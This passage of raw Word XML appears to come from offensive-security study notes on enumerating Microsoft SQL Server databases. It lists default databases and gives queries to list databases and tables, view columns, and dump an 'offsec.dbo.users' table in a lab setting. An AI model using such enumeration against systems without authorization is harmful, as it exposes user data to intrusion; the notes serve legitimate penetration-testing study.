          <w:numId w:val="1414"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">master</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tempdb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">model</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msdb </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are default databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001923">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1414"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if you see something besides these, then take a look!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001924">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT name FROM master..sysdatabases;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001925">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1414"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Older version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001926">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001927">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List Tables in the a database (you don't currently need to be inside of a database):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001928">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.information_schema.tables;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001929">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the database name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No matter the database name, you have to include </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.information_schema.tables;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3548063" cy="559342"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="213" name="image217.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image217.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId514"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3548063" cy="559342"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our query returned the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table as the only one available in the database, so let's inspect it by selecting all of its records. We'll need to specify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dbo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table schema between the database and the table names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect table:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from offsec.dbo.users;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dbo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the table schema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001932">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We need to specify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dbo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table schema between the database and the table names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the table name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="567"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2101258" cy="1171705"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="435" name="image427.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image427.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId515"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2101258" cy="1171705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001935">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001936">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to a Database (idk if it works, but the below commands with SELECT don't even need you to go into a specific database, since the SELECT commands will specify the database in the command)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001937">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1201"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE [database_name];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001938">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001939">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List Tables in the Current Database (you need to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command beforehand)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM INFORMATION_SCHEMA.TABLES;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View Columns of a Specific Table Replace [table_name] with the table of interest:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT COLUMN_NAME, DATA_TYPE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM INFORMATION_SCHEMA.COLUMNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE TABLE_NAME = '[table_name]';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001940">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001941">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001942">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001943">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001944">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Querying Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001945">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001946">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieve All Data from a Table Replace [table_name] with your target table:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001947">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM [table_name];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001948">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001949">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter Data Add WHERE clauses to refine your queries:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000194A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
